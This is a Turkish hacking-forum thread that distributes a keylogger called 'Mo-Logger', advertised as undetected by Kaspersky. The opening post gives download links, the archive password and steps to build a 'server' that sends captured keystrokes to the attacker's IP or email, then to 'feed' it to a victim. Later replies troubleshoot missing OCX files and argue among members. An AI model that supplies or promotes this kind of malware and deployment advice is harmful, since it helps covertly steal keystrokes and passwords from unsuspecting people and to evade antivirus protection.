Mo-Logger "Kaspersky Tanımaz" !!

Hell

Başarıda bir sanattır.
Reaction score
0
Mo-Logger "Kaspersky Tanımaz" !!

File: MyLogger
Coder: Anonymous
Download:

http://www.speedyshare.com/367986852.html
or:
http://rapidshare.com/files/46608965/McLogger.zip.html

Zip Pass: hellboy726
Boyut : 719 KB

buildServer.jpg

Reader.jpg

title.jpg

Kısa bir anlatım:

Programı çalıştırın. Ocx hatası alınan altlarda bulunan bir mesajımı incelesin.
Programı açın,
Daha sonra make a server Butonuna tıklayın.

Açılan pencereden Sin Adress 'e sabit ip numaranızı , port a açmış olduğunuz portu , icondan istediğiniz şekli , seçebilirsiniz.

Saadece log derseniz ; e-mail logs u işaretler daha sonra smtp serverinizi seçer ardından adresiniiz girer oluştururunuz.

serveri oluşturun ve yedirin.

Not: test edilmemiştir.

'Kaspersky Tanımaz' tam milletin istediği gibi hell tbrkler walla

Edit: Component actskn43.ocx or one of its dependencies not correctly registered: a file is missing or invalid

bu hatanın anlamı nedir :eek:

anlatımını 8 :D gözle bekliyom çok uuzn sürermi acaba ???

kaspersky tanımadan bi an önce kurmak lazım ama dosya hatalı yenilermisiniz ?

FixHiuS' Alıntı:
'Kaspersky Tanımaz' tam milletin istediği gibi hell tbrkler walla

Edit: Component actskn43.ocx or one of its dependencies not correctly registered: a file is missing or invalid

bu hatanın anlamı nedir :eek:

helldeki acskin patch sizde yok demek.

download:
http://www.afreeocx.com/ocx/info/actskn43_ocx.html

c:/windows/system32 ye yapıştırın.

yapıştırdım hata devam ediyor

Resimli anlatıma geek yok hellboy sen sadece incelemelerinden bir iki bilgi payşasaydın iyi olurdu. Diğer logerlerden farkı nedir ? SERVER oluşturuyormu aldığı kayıtlar nelerdir onları söylemen yeterliydi . Lütfen biraz daha ciddi eklemeler yapalım logeri ekliyosun özelliklerini yazmıyorsun ha diyosan alın araştırın siz yazın o zaman araştırmaya değecek kadar iyi birşeymi onu söyle bari. Anlatım sonra diyosunda başka bi analatımada sonra demiştin hala bekliyoruz anlatmanı anlatacağın yok.

suphi30' Alıntı:
Resimli anlatıma geek yok hellboy sen sadece incelemelerinden bir iki bilgi payşasaydın iyi olurdu. Diğer logerlerden farkı nedir ? SERVER oluşturuyormu aldığı kayıtlar nelerdir onları söylemen yeterliydi . Lütfen biraz daha ciddi eklemeler yapalım logeri ekliyosun özelliklerini yazmıyorsun ha diyosan alın araştırın siz yazın o zaman araştırmaya değecek kadar iyi birşeymi onu söyle bari. Anlatım sonra diyosunda başka bi analatımada sonra demiştin hala bekliyoruz anlatmanı anlatacağın yok.

bana böyle yapsalar bende anlatmam .. sabır biraz..

hata devam ediyo bundan bende bişey anlamadım anlatım yapmanı beklicem ama bende önceki o konuyun hatırlıyom ondada böyle demiştin ama ben gene bi ümit beklicem

hataya son işte çözüm actskn43.ocx system32 yapıştır comdlg32.ocx bunuda yapıştır sonra mologger hangi dosyada ise orayada comdlg32.ocx koyun oluya ben denedim comdlg32.ocx
bunun linkide http://www.indirici.com/download.asp?file_id=2300 sadece bi teşekkür

suphi30' Alıntı:

sizin gibiler gelir,
11 mesaj atar oraya buraya,
0 paylaşım yapar,
Gerçekten işi olan meşgul olan ve zar zor vakit ayıran birinin yaptığı Kaspersky ın tanımadığı keyloggere laf eder.
Biraz daha ciddi olalım der. ve kendisinin ciddiliğini bize göstermez.

İşte biz size sömürücü diyoruz.

Not: kısa anlatım ilk mesaj a eklendi.

emre.bjk' Alıntı:
hell,

halen hatayi veriyor..S?

8. mesajdaki ock eklentisi yeterli.
ayrıca guvencan 'da eklemiş.

8. mesajdaki bende problem çıkarmadı.

hata alan arkadaşlar Mo-logger içerisine actskn43.ocx dosyasını silin sadece system32 içerisine kopyalayın hata vermiyor.

bende yine ayni hatayi veriyor..

actskn43.ocx bunu alip,kopyalayip, windows/system32 nin icine attim..

daha sonra guvencan arkadasimizin verdigi comdlg32.ocx dosyasini ayni sekilde koypalayip, windows/system32 icine attim.. ve masa üstüne gidip, mc loggeri calistiriken yine ayni hatayi verdi...??

server oluşturdum yedirdim tüm ayarlar ok ama programda tık yok.

Bunu kurupta olumlu sonuç alan varmı beyler ?

Geri